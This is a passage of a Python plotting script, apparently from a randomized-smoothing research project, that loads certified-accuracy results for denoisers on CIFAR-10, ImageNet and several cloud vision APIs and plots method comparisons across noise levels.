for noise in [0.12, 0.25, 0.50, 1.00]
for exp in [
# each of these correspond to a hyperparamter setting (see the appendix in the paper for details)
'MODEL_resnet110_90epochs_DENOISER_cifar10_classification_obj_adamThenSgd_1',
'MODEL_resnet110_90epochs_DENOISER_cifar10_classification_obj_adamThenSgd_2',
'MODEL_resnet110_90epochs_DENOISER_cifar10_classification_obj_adamThenSgd_3',
'MODEL_resnet110_90epochs_DENOISER_cifar10_classification_obj_adamThenSgd_4',
'MODEL_resnet110_90epochs_DENOISER_cifar10_classification_obj_adamThenSgd_5',
'MODEL_resnet110_90epochs_DENOISER_cifar10_classification_obj_adamThenSgd_6',
]
for denoiser in denoiser_networks
]
all_exp_resnet110_queryAccess_cifar10_stability = [
Line(ApproximateAccuracy("data/certify/cifar10/stab_obj/{0}_multi_classifiers_{1}/noise_{2:.2f}/test_N10000/sigma_{2:.2f}".format(exp, denoiser, noise)), "$\sigma = {:.2f}$".format(noise))
for noise in [0.12, 0.25, 0.50, 1.00]
for exp in [
# each of these correspond to a hyperparamter setting (see the appendix in the paper for details)
'MODEL_resnet110_90epochs_DENOISER_cifar10_smoothness_obj_adamThenSgd_1',
'MODEL_resnet110_90epochs_DENOISER_cifar10_smoothness_obj_adamThenSgd_2',
'MODEL_resnet110_90epochs_DENOISER_cifar10_smoothness_obj_adamThenSgd_3',
'MODEL_resnet110_90epochs_DENOISER_cifar10_smoothness_obj_adamThenSgd_4',
'MODEL_resnet110_90epochs_DENOISER_cifar10_smoothness_obj_adamThenSgd_5',
'MODEL_resnet110_90epochs_DENOISER_cifar10_smoothness_obj_adamThenSgd_6',
]
for denoiser in denoiser_networks
]
all_exp_resnet110_queryAccess_cifar10_stability_1surrogate = [
Line(ApproximateAccuracy("data/certify/cifar10/stab_obj/MODEL_ResNet110_DENOISER_surrogate_resnet110/noise_{0:.2f}/test_N10000/sigma_{0:.2f}".format(noise)), "$\sigma = {:.2f}$".format(noise))
for noise in [0.12, 0.25, 0.50, 1.00]
]
all_exp_resnet110_queryAccess_cifar10_stability_finetune_1surrogate = [
Line(ApproximateAccuracy("data/certify/cifar10/stab+mse_obj/{0}_{1}/noise_{2:.2f}/test_N10000/sigma_{2:.2f}".format(exp, denoiser, noise)), "$\sigma = {:.2f}$".format(noise))
for noise in [0.12, 0.25, 0.50, 1.00]
for exp in [
'MODEL_resnet110_90epochs_DENOISER_cifar10_finetune_smoothness_obj_adam_1e-4_20epochs_WRN',
'MODEL_resnet110_90epochs_DENOISER_cifar10_finetune_smoothness_obj_adam_1e-5_20epochs_WRN',
'MODEL_resnet110_90epochs_DENOISER_cifar10_finetune_smoothness_obj_sgd_1e-4_20epochs_WRN',
'MODEL_resnet110_90epochs_DENOISER_cifar10_finetune_smoothness_obj_sgd_1e-5_20epochs_WRN',
]
for denoiser in denoiser_networks
]
all_exp_resnet110_queryAccess_cifar10_stability_finetune_14surrogate = [
Line(ApproximateAccuracy("data/certify/cifar10/stab+mse_obj/{0}_{1}/noise_{2:.2f}/test_N10000/sigma_{2:.2f}".format(exp, denoiser, noise)), "$\sigma = {:.2f}$".format(noise))
for noise in [0.12, 0.25, 0.50, 1.00]
for exp in [
'MODEL_resnet110_90epochs_DENOISER_cifar10_finetune_smoothness_obj_adam_1e-4_20epochs_multi_classifiers',
'MODEL_resnet110_90epochs_DENOISER_cifar10_finetune_smoothness_obj_adam_1e-5_20epochs_multi_classifiers',
'MODEL_resnet110_90epochs_DENOISER_cifar10_finetune_smoothness_obj_sgd_1e-4_20epochs_multi_classifiers',
'MODEL_resnet110_90epochs_DENOISER_cifar10_finetune_smoothness_obj_sgd_1e-5_20epochs_multi_classifiers',
]
for denoiser in denoiser_networks
]
# Plot best models
plot_certified_accuracy_one_sigma_best_model_multiple_methods(
"analysis/plots/cifar10/query_access/resnet110_90epochs_all_methods_sigma_12", 'blackbox_cifar_best_models', 1.0,
methods_labels_colors_dashes=[
(all_cifar_cohen_N10000, 'White-box', 'b', [1, 0]),
(all_exp_resnet110_queryAccess_cifar10_stability, 'Stab 14-Surrogates', 'g', [6, 2]),
(all_exp_resnet110_queryAccess_cifar10_stability_finetune_14surrogate, 'Stab+MSE 14-Surrogates', 'orange', [4, 2]),
(all_cifar_denoising_obj_denoisers, 'MSE', 'r', [2, 4]),
(cifar_no_denoiser_N10000, 'No denoiser', 'k', [5, 1]),
],
sigma=0.12)
plot_certified_accuracy_one_sigma_best_model_multiple_methods(
"analysis/plots/cifar10/query_access/resnet110_90epochs_all_methods_sigma_25", 'blackbox_cifar_best_models', 1.0,
methods_labels_colors_dashes=[
(all_cifar_cohen_N10000, 'White-box', 'b', [1, 0]),
(all_exp_resnet110_queryAccess_cifar10_stability, 'Stab 14-Surrogates', 'g', [6, 2]),
(all_exp_resnet110_queryAccess_cifar10_stability_finetune_14surrogate, 'Stab+MSE 14-Surrogates', 'orange', [4, 2]),
(all_cifar_denoising_obj_denoisers, 'MSE', 'r', [2, 4]),
(cifar_no_denoiser_N10000, 'No denoiser', 'k', [5, 1]),
],
sigma=0.25)
plot_certified_accuracy_one_sigma_best_model_multiple_methods(
"analysis/plots/cifar10/query_access/resnet110_90epochs_all_methods_sigma_50", 'blackbox_cifar_best_models', 1.0,
methods_labels_colors_dashes=[
(all_cifar_cohen_N10000, 'White-box', 'b', [1, 0]),
(all_exp_resnet110_queryAccess_cifar10_stability, 'Stab 14-Surrogates', 'g', [6, 2]),
(all_exp_resnet110_queryAccess_cifar10_stability_finetune_14surrogate, 'Stab+MSE 14-Surrogates', 'orange', [4, 2]),
(all_cifar_denoising_obj_denoisers, 'MSE', 'r', [2, 4]),
(cifar_no_denoiser_N10000, 'No denoiser', 'k', [5, 1]),
],
sigma=0.50)
plot_certified_accuracy_one_sigma_best_model_multiple_methods(
"analysis/plots/cifar10/query_access/resnet110_90epochs_all_methods_sigma_100", 'blackbox_cifar_best_models', 1.0,
methods_labels_colors_dashes=[
(all_cifar_cohen_N10000, 'White-box', 'b', [1, 0]),
(all_exp_resnet110_queryAccess_cifar10_stability, 'Stab 14-Surrogates', 'g', [6, 2]),
(all_exp_resnet110_queryAccess_cifar10_stability_finetune_14surrogate, 'Stab+MSE 14-Surrogates', 'orange', [4, 2]),
(all_cifar_denoising_obj_denoisers, 'MSE', 'r', [2, 4]),
(cifar_no_denoiser_N10000, 'No denoiser', 'k', [5, 1]),
],
sigma=1.00)
plot_certified_accuracy_per_sigma_best_model(
"analysis/plots/cifar10/query_access/resnet110_90epochs_stab_vs_clf", 'finetune_cifar_best_models', 2.25,
methods=all_exp_resnet110_queryAccess_cifar10_stability, label='Stab',
methods_base=all_exp_resnet110_queryAccess_cifar10_classification, label_base='Clf',
sigmas=[0.12, 0.25, 0.5, 1.0])
## 1 Surrogate
plot_certified_accuracy_one_sigma_best_model_multiple_methods(
"analysis/plots/cifar10/query_access/resnet110_90epochs_all_methods_sigma_12_1surrogate_vs_14", 'blackbox_cifar_best_models', 1.0,
methods_labels_colors_dashes=[
(all_exp_resnet110_queryAccess_cifar10_stability, 'Stab 14-Surrogates', 'g', [6, 2]),
(all_exp_resnet110_queryAccess_cifar10_stability_1surrogate, 'Stab 1-Surrogate', 'b', [2, 4]),
(all_exp_resnet110_queryAccess_cifar10_stability_finetune_14surrogate, 'Stab+MSE 14-Surrogates', 'orange', [4, 2]),
(all_exp_resnet110_queryAccess_cifar10_stability_finetune_1surrogate, 'Stab+MSE 1-Surrogate', 'k', [5, 1]),
],
sigma=0.12)
plot_certified_accuracy_one_sigma_best_model_multiple_methods(
"analysis/plots/cifar10/query_access/resnet110_90epochs_all_methods_sigma_25_1surrogate_vs_14", 'blackbox_cifar_best_models', 1.0,
methods_labels_colors_dashes=[
(all_exp_resnet110_queryAccess_cifar10_stability, 'Stab 14-Surrogates', 'g', [6, 2]),
(all_exp_resnet110_queryAccess_cifar10_stability_1surrogate, 'Stab 1-Surrogate', 'b', [2, 4]),
(all_exp_resnet110_queryAccess_cifar10_stability_finetune_14surrogate, 'Stab+MSE 14-Surrogates', 'orange', [4, 2]),
(all_exp_resnet110_queryAccess_cifar10_stability_finetune_1surrogate, 'Stab+MSE 1-Surrogate', 'k', [5, 1]),
],
sigma=0.25)
plot_certified_accuracy_one_sigma_best_model_multiple_methods(
"analysis/plots/cifar10/query_access/resnet110_90epochs_all_methods_sigma_50_1surrogate_vs_14", 'blackbox_cifar_best_models', 1.0,
methods_labels_colors_dashes=[
(all_exp_resnet110_queryAccess_cifar10_stability, 'Stab 14-Surrogates', 'g', [6, 2]),
(all_exp_resnet110_queryAccess_cifar10_stability_1surrogate, 'Stab 1-Surrogate', 'b', [2, 4]),
(all_exp_resnet110_queryAccess_cifar10_stability_finetune_14surrogate, 'Stab+MSE 14-Surrogates', 'orange', [4, 2]),
(all_exp_resnet110_queryAccess_cifar10_stability_finetune_1surrogate, 'Stab+MSE 1-Surrogate', 'k', [5, 1]),
],
sigma=0.50)
plot_certified_accuracy_one_sigma_best_model_multiple_methods(
"analysis/plots/cifar10/query_access/resnet110_90epochs_all_methods_sigma_100_1surrogate_vs_14", 'blackbox_cifar_best_models', 1.0,
methods_labels_colors_dashes=[
(all_exp_resnet110_queryAccess_cifar10_stability, 'Stab 14-Surrogates', 'g', [6, 2]),
(all_exp_resnet110_queryAccess_cifar10_stability_1surrogate, 'Stab 1-Surrogate', 'b', [2, 4]),
(all_exp_resnet110_queryAccess_cifar10_stability_finetune_14surrogate, 'Stab+MSE 14-Surrogates', 'orange', [4, 2]),
(all_exp_resnet110_queryAccess_cifar10_stability_finetune_1surrogate, 'Stab+MSE 1-Surrogate', 'k', [5, 1]),
],
sigma=1.00)
##############################################################################################################
##############################################################################################################
##############################################################################################################
##############################################################################################################
#################################################################################################################
#Imagenet results
imagenet_archs = ['resnet18', 'resnet34', 'resnet50']
imagenet_results = edict()
for arch in imagenet_archs:
imagenet_results[arch] = edict()
imagenet_results[arch].imagenet_no_denoiser_N10000 = [
Line(ApproximateAccuracy("data/certify/imagenet/MODEL_{0}/noise_0.00/test_N10000/sigma_{1:.2f}".format(arch, noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25, 0.5, 1.0]
]
imagenet_results[arch].imagenet_denoiser_dncnn_off_the_shelf_N10000 = [
Line(ApproximateAccuracy("data/certify/imagenet/MODEL_{0}_DENOISER_dncnn-off-the-shelf/noise_{1:.2f}/test_N10000/sigma_{1:.2f}".format(arch, noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25, 0.5, 1.0]
]
imagenet_results[arch].imagenet_denoiser_imagenet_dncnn_5epoch_lr1e_4_N10000 = [
Line(ApproximateAccuracy("data/certify/imagenet/MODEL_{0}_DENOISER_imagenet_dncnn_5epoch_lr1e-4/noise_{1:.2f}/test_N10000/sigma_{1:.2f}".format(arch, noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25, 0.5, 1.0]
]
imagenet_results[arch].all_imagenet_denoising_obj_denoisers = imagenet_results[arch].imagenet_denoiser_imagenet_dncnn_5epoch_lr1e_4_N10000
# imagenet_results[arch].imagenet_denoiser_dncnn_off_the_shelf_N10000 + \
## Classification objective denoisers
imagenet_results[arch].all_imagenet_classification_obj_N10000 = {}
imagenet_results[arch].all_imagenet_classification_obj_N10000['resnet18'] = [
Line(ApproximateAccuracy("data/certify/imagenet/MODEL_{0}_DENOISER_{2}/resnet18/dncnn/noise_{1:.2f}/test_N10000/sigma_{1:.2f}".format(arch, noise, denoiser)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25, 0.5, 1.0]
for denoiser in ['imagenet_classification_obj_adam_1e-5_20epochs',
]
]
imagenet_results[arch].all_imagenet_classification_obj_N10000['resnet34'] = [
Line(ApproximateAccuracy("data/certify/imagenet/MODEL_{0}_DENOISER_{2}/resnet34/dncnn/noise_{1:.2f}/test_N10000/sigma_{1:.2f}".format(arch, noise, denoiser)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25, 0.5, 1.0]
for denoiser in ['imagenet_classification_obj_adam_1e-5_20epochs',
]
]
imagenet_results[arch].all_imagenet_classification_obj_N10000['resnet50'] = [
Line(ApproximateAccuracy("data/certify/imagenet/MODEL_{0}_DENOISER_{2}/resnet50/dncnn/noise_{1:.2f}/test_N10000/sigma_{1:.2f}".format(arch, noise, denoiser)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25, 0.5, 1.0]
for denoiser in ['imagenet_classification_obj_adam_1e-5_20epochs',
]
]
## Stability Objective denoisers
imagenet_results[arch].all_imagenet_stability_obj_N10000 = {}
imagenet_results[arch].all_imagenet_stability_obj_N10000['resnet18'] = [
Line(ApproximateAccuracy("data/certify/imagenet/MODEL_{0}_DENOISER_{2}/resnet18/dncnn/noise_{1:.2f}/test_N10000/sigma_{1:.2f}".format(arch, noise, denoiser)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25, 0.5, 1.0]
for denoiser in ['imagenet_smoothness_obj_adam_1e-5_20epochs',
]
]
imagenet_results[arch].all_imagenet_stability_obj_N10000['resnet34'] = [
Line(ApproximateAccuracy("data/certify/imagenet/MODEL_{0}_DENOISER_{2}/resnet34/dncnn/noise_{1:.2f}/test_N10000/sigma_{1:.2f}".format(arch, noise, denoiser)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25, 0.5, 1.0]
for denoiser in ['imagenet_smoothness_obj_adam_1e-5_20epochs',
]
]
imagenet_results[arch].all_imagenet_stability_obj_N10000['resnet50'] = [
Line(ApproximateAccuracy("data/certify/imagenet/MODEL_{0}_DENOISER_{2}/resnet50/dncnn/noise_{1:.2f}/test_N10000/sigma_{1:.2f}".format(arch, noise, denoiser)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25, 0.5, 1.0]
for denoiser in ['imagenet_smoothness_obj_adam_1e-5_20epochs',
]
]
imagenet_results[arch].cohen_training_N10000 = {}
imagenet_results[arch].cohen_training_N10000=[
Line(ApproximateAccuracy("data/certify/imagenet/MODEL_{1}/noise_{0:.2f}/test_N10000/sigma_{0:.2f}".format(noise, arch)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.25, 0.5, 1.0]
]
# Imagenet plots
for arch in imagenet_archs:
### Full-Access
plot_certified_accuracy_per_sigma_best_model(
"analysis/plots/imagenet/full_access/MODEL_{}_Stab_vs_Clf".format(arch), '{} Stab vs Clf'.format(arch), 2.25,
methods=imagenet_results[arch].all_imagenet_stability_obj_N10000[arch], label='Stab+MSE',
methods_base=imagenet_results[arch].all_imagenet_classification_obj_N10000[arch], label_base='Clf+MSE',
sigmas=[0.12, 0.25, 0.5, 1.0])
plot_certified_accuracy_one_sigma_best_model_multiple_methods(
"analysis/plots/imagenet/full_access/MODEL_{}_all_methods_stability_sigma_25".format(arch), 'fixed_imagenet_best_models', 1.0,
methods_labels_colors_dashes=[
(imagenet_results[arch].cohen_training_N10000, 'White-box', 'b', [1, 0]),
(imagenet_results[arch].all_imagenet_stability_obj_N10000[arch], 'Stab+MSE', 'orange', [4, 2]),
(imagenet_results[arch].all_imagenet_denoising_obj_denoisers, 'MSE', 'r', [2, 4]),
(imagenet_results[arch].imagenet_no_denoiser_N10000, 'No denoiser', 'k', [5, 1]),
],
sigma=0.25)
plot_certified_accuracy_one_sigma_best_model_multiple_methods(
"analysis/plots/imagenet/full_access/MODEL_{}_all_methods_stability_sigma_50".format(arch), 'fixed_imagenet_best_models', 1.0,
methods_labels_colors_dashes=[
(imagenet_results[arch].cohen_training_N10000, 'White-box', 'b', [1, 0]),
(imagenet_results[arch].all_imagenet_stability_obj_N10000[arch], 'Stab+MSE', 'orange', [4, 2]),
(imagenet_results[arch].all_imagenet_denoising_obj_denoisers, 'MSE', 'r', [2, 4]),
(imagenet_results[arch].imagenet_no_denoiser_N10000, 'No denoiser', 'k', [5, 1]),
],
sigma=0.50)
plot_certified_accuracy_one_sigma_best_model_multiple_methods(
"analysis/plots/imagenet/full_access/MODEL_{}_all_methods_stability_sigma_100".format(arch), 'fixed_imagenet_best_models', 1.0,
methods_labels_colors_dashes=[
(imagenet_results[arch].cohen_training_N10000, 'White-box', 'b', [1, 0]),
(imagenet_results[arch].all_imagenet_stability_obj_N10000[arch], 'Stab+MSE', 'orange', [4, 2]),
(imagenet_results[arch].all_imagenet_denoising_obj_denoisers, 'MSE', 'r', [2, 4]),
(imagenet_results[arch].imagenet_no_denoiser_N10000, 'No denoiser', 'k', [5, 1]),
],
sigma=1.00)
### Query-Access
surrogate_models = [(imagenet_results[arch].all_imagenet_stability_obj_N10000[b], 'Stab+MSE-{}'.format(b), color, dashes)
for b, color, dashes in zip(set(imagenet_archs) - set([arch]),
['g', 'orange'],
[[6, 2], [4, 2]],
)
]
plot_certified_accuracy_one_sigma_best_model_multiple_methods(
"analysis/plots/imagenet/query_access/MODEL_{}_stability_sigma_25_with_surrogate".format(arch), 'blackbox_imagenet_best_models', 1.0,
methods_labels_colors_dashes=[
(imagenet_results[arch].cohen_training_N10000, 'White-box', 'b', [1, 0]),] + surrogate_models + [
(imagenet_results[arch].all_imagenet_denoising_obj_denoisers, 'MSE', 'r', [2, 4]),
(imagenet_results[arch].imagenet_no_denoiser_N10000, 'No denoiser', 'k', [5, 1]),
],
sigma=0.25)
plot_certified_accuracy_one_sigma_best_model_multiple_methods(
"analysis/plots/imagenet/query_access/MODEL_{}_stability_sigma_50_with_surrogate".format(arch), 'blackbox_imagenet_best_models', 1.0,
methods_labels_colors_dashes=[
(imagenet_results[arch].cohen_training_N10000, 'White-box', 'b', [1, 0]),] + surrogate_models + [
(imagenet_results[arch].all_imagenet_denoising_obj_denoisers, 'MSE', 'r', [2, 4]),
(imagenet_results[arch].imagenet_no_denoiser_N10000, 'No denoiser', 'k', [5, 1]),
],
sigma=0.50)
plot_certified_accuracy_one_sigma_best_model_multiple_methods(
"analysis/plots/imagenet/query_access/MODEL_{}_stability_sigma_100_with_surrogate".format(arch), 'blackbox_imagenet_best_models', 1.0,
methods_labels_colors_dashes=[
(imagenet_results[arch].cohen_training_N10000, 'White-box', 'b', [1, 0]),] + surrogate_models + [
(imagenet_results[arch].all_imagenet_denoising_obj_denoisers, 'MSE', 'r', [2, 4]),
(imagenet_results[arch].imagenet_no_denoiser_N10000, 'No denoiser', 'k', [5, 1]),
],
sigma=1.00)
##################################################################################################
# VISION API
google_api_mse = [
Line(ApproximateAccuracy_API("data/certify/vision_api/google/imagenet_denoiser_mse/{0:.2f}/log.txt".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25]
]
google_api_no_noise = [
Line(ApproximateAccuracy_API("data/certify/vision_api/google/no_denoiser/{0:.2f}/log.txt".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25]
]
azure_api_mse = [
Line(ApproximateAccuracy_API("data/certify/vision_api/azure/imagenet_denoiser_mse/{0:.2f}/log.txt".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25]
]
azure_api_mse_1k = [
Line(ApproximateAccuracy_API("data/certify/vision_api/azure/imagenet_denoiser_mse/{0:.2f}_1k/log.txt".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25]
]
azure_api_no_noise = [
Line(ApproximateAccuracy_API("data/certify/vision_api/azure/no_denoiser/{0:.2f}/log.txt".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25]
]
aws_api_mse = [
Line(ApproximateAccuracy_API("data/certify/vision_api/aws/imagenet_denoiser_mse/{0:.2f}/log.txt".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25]
]
aws_api_no_noise = [
Line(ApproximateAccuracy_API("data/certify/vision_api/aws/no_denoiser/{0:.2f}/log.txt".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25]
]
clarifai_api_mse = [
Line(ApproximateAccuracy_API("data/certify/vision_api/clarifai/imagenet_denoiser_mse/{0:.2f}/log.txt".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25]
]
clarifai_api_no_noise = [
Line(ApproximateAccuracy_API("data/certify/vision_api/clarifai/no_denoiser/{0:.2f}/log.txt".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25]
]
azure_api_clf_resnet18 = [
Line(ApproximateAccuracy_API("data/certify/vision_api/azure/imagenet_denoiser_classification_obj_adam_1e-5_20epochs/resnet18/{0:.2f}/log.txt".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25]
]
azure_api_clf_resnet34 = [
Line(ApproximateAccuracy_API("data/certify/vision_api/azure/imagenet_denoiser_classification_obj_adam_1e-5_20epochs/resnet34/{0:.2f}/log.txt".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25]
]
azure_api_clf_resnet50 = [
Line(ApproximateAccuracy_API("data/certify/vision_api/azure/imagenet_denoiser_classification_obj_adam_1e-5_20epochs/resnet50/{0:.2f}/log.txt".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25]
]
clarifai_api_clf_resnet18 = [
Line(ApproximateAccuracy_API("data/certify/vision_api/clarifai/imagenet_denoiser_classification_obj_adam_1e-5_20epochs/resnet18/{0:.2f}/log.txt".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25]
]
clarifai_api_clf_resnet34 = [
Line(ApproximateAccuracy_API("data/certify/vision_api/clarifai/imagenet_denoiser_classification_obj_adam_1e-5_20epochs/resnet34/{0:.2f}/log.txt".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25]
]
clarifai_api_clf_resnet50 = [
Line(ApproximateAccuracy_API("data/certify/vision_api/clarifai/imagenet_denoiser_classification_obj_adam_1e-5_20epochs/resnet50/{0:.2f}/log.txt".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25]
]
google_api_clf_resnet18 = [
Line(ApproximateAccuracy_API("data/certify/vision_api/google/imagenet_denoiser_classification_obj_adam_1e-5_20epochs/resnet18/{0:.2f}/log.txt".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25]
]
google_api_clf_resnet34 = [
Line(ApproximateAccuracy_API("data/certify/vision_api/google/imagenet_denoiser_classification_obj_adam_1e-5_20epochs/resnet34/{0:.2f}/log.txt".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25]
]
google_api_clf_resnet50 = [
Line(ApproximateAccuracy_API("data/certify/vision_api/google/imagenet_denoiser_classification_obj_adam_1e-5_20epochs/resnet50/{0:.2f}/log.txt".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25]
]
aws_api_clf_resnet18 = [
Line(ApproximateAccuracy_API("data/certify/vision_api/aws/imagenet_denoiser_classification_obj_adam_1e-5_20epochs/resnet18/{0:.2f}/log.txt".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25]
]
aws_api_clf_resnet34 = [
Line(ApproximateAccuracy_API("data/certify/vision_api/aws/imagenet_denoiser_classification_obj_adam_1e-5_20epochs/resnet34/{0:.2f}/log.txt".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25]
]
aws_api_clf_resnet50 = [
Line(ApproximateAccuracy_API("data/certify/vision_api/aws/imagenet_denoiser_classification_obj_adam_1e-5_20epochs/resnet50/{0:.2f}/log.txt".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25]
]
azure_api_smooth_resnet18 = [
Line(ApproximateAccuracy_API("data/certify/vision_api/azure/imagenet_denoiser_smoothness_obj_adam_1e-5_20epochs/resnet18/{0:.2f}/log.txt".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25]
]
azure_api_smooth_resnet34 = [
Line(ApproximateAccuracy_API("data/certify/vision_api/azure/imagenet_denoiser_smoothness_obj_adam_1e-5_20epochs/resnet34/{0:.2f}/log.txt".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25]
]
azure_api_smooth_resnet50 = [
Line(ApproximateAccuracy_API("data/certify/vision_api/azure/imagenet_denoiser_smoothness_obj_adam_1e-5_20epochs/resnet50/{0:.2f}/log.txt".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25]
]
aws_api_smooth_resnet18 = [
Line(ApproximateAccuracy_API("data/certify/vision_api/aws/imagenet_denoiser_smoothness_obj_adam_1e-5_20epochs/resnet18/{0:.2f}/log.txt".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25]
]
aws_api_smooth_resnet34 = [
Line(ApproximateAccuracy_API("data/certify/vision_api/aws/imagenet_denoiser_smoothness_obj_adam_1e-5_20epochs/resnet34/{0:.2f}/log.txt".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25]
]
aws_api_smooth_resnet50 = [
Line(ApproximateAccuracy_API("data/certify/vision_api/aws/imagenet_denoiser_smoothness_obj_adam_1e-5_20epochs/resnet50/{0:.2f}/log.txt".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25]
]
clarifai_api_smooth_resnet18 = [
Line(ApproximateAccuracy_API("data/certify/vision_api/clarifai/imagenet_denoiser_smoothness_obj_adam_1e-5_20epochs/resnet18/{0:.2f}/log.txt".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25]
]
clarifai_api_smooth_resnet34 = [
Line(ApproximateAccuracy_API("data/certify/vision_api/clarifai/imagenet_denoiser_smoothness_obj_adam_1e-5_20epochs/resnet34/{0:.2f}/log.txt".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25]
]
clarifai_api_smooth_resnet50 = [
Line(ApproximateAccuracy_API("data/certify/vision_api/clarifai/imagenet_denoiser_smoothness_obj_adam_1e-5_20epochs/resnet50/{0:.2f}/log.txt".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25]
]
google_api_smooth_resnet18 = [
Line(ApproximateAccuracy_API("data/certify/vision_api/google/imagenet_denoiser_smoothness_obj_adam_1e-5_20epochs/resnet18/{0:.2f}/log.txt".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25]
]
google_api_smooth_resnet34 = [
Line(ApproximateAccuracy_API("data/certify/vision_api/google/imagenet_denoiser_smoothness_obj_adam_1e-5_20epochs/resnet34/{0:.2f}/log.txt".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25]
]
google_api_smooth_resnet50 = [
Line(ApproximateAccuracy_API("data/certify/vision_api/google/imagenet_denoiser_smoothness_obj_adam_1e-5_20epochs/resnet50/{0:.2f}/log.txt".format(noise)), "$\sigma = {0:.2f}$".format(noise))
for noise in [0.12, 0.25]
]
plot_certified_accuracy_per_sigma_against_baseline(
"analysis/plots/vision_api/azure/denoiser_finetune_smooth_res18_vs_denoiser_mse", '', 0.6,
methods=azure_api_smooth_resnet18, label='Stab+MSE on ResNet18',
methods_base=azure_api_mse, label_base="MSE")
plot_certified_accuracy_per_sigma_against_baseline(
"analysis/plots/vision_api/azure/denoiser_finetune_smooth_res34_vs_denoiser_mse", '', 0.6,
methods=azure_api_smooth_resnet34, label='Stab+MSE on Resnet34',
methods_base=azure_api_mse, label_base="MSE")
plot_certified_accuracy_per_sigma_against_baseline(
"analysis/plots/vision_api/azure/denoiser_finetune_smooth_res50_vs_denoiser_mse", '', 0.6,
methods=azure_api_smooth_resnet50, label='Stab+MSE on ResNet50',
methods_base=azure_api_mse, label_base="MSE")
plot_certified_accuracy_per_sigma_against_baseline(
"analysis/plots/vision_api/google/denoiser_finetune_smooth_res18_vs_denoiser_mse", '', 0.6,
methods=google_api_smooth_resnet18, label='Stab+MSE on ResNet18',
methods_base=google_api_mse, label_base="MSE")
plot_certified_accuracy_per_sigma_against_baseline(
"analysis/plots/vision_api/google/denoiser_finetune_smooth_res34_vs_denoiser_mse", '', 0.6,
methods=google_api_smooth_resnet34, label='Stab+MSE on Resnet34',
methods_base=google_api_mse, label_base="MSE")
plot_certified_accuracy_per_sigma_against_baseline(
"analysis/plots/vision_api/google/denoiser_finetune_smooth_res50_vs_denoiser_mse", '', 0.6,
methods=google_api_smooth_resnet50, label='Stab+MSE on ResNet50',
methods_base=google_api_mse, label_base="MSE")
plot_certified_accuracy_per_sigma_against_baseline(
"analysis/plots/vision_api/aws/denoiser_finetune_smooth_res18_vs_denoiser_mse", '', 0.6,
methods=aws_api_smooth_resnet18, label='Stab+MSE on ResNet18',
methods_base=aws_api_mse, label_base="MSE")
plot_certified_accuracy_per_sigma_against_baseline(
"analysis/plots/vision_api/aws/denoiser_finetune_smooth_res34_vs_denoiser_mse", '', 0.6,
methods=aws_api_smooth_resnet34, label='Stab+MSE on Resnet34',
methods_base=aws_api_mse, label_base="MSE")
plot_certified_accuracy_per_sigma_against_baseline(
"analysis/plots/vision_api/aws/denoiser_finetune_smooth_res50_vs_denoiser_mse", '', 0.6,
methods=aws_api_smooth_resnet50, label='Stab+MSE on ResNet50',
methods_base=aws_api_mse, label_base="MSE")
plot_certified_accuracy_per_sigma_against_baseline(
"analysis/plots/vision_api/clarifai/denoiser_finetune_smooth_res18_vs_denoiser_mse", '', 0.6,
methods=clarifai_api_smooth_resnet18, label='Stab+MSE on ResNet18',
methods_base=clarifai_api_mse, label_base="MSE")
plot_certified_accuracy_per_sigma_against_baseline(
"analysis/plots/vision_api/clarifai/denoiser_finetune_smooth_res34_vs_denoiser_mse", '', 0.6,
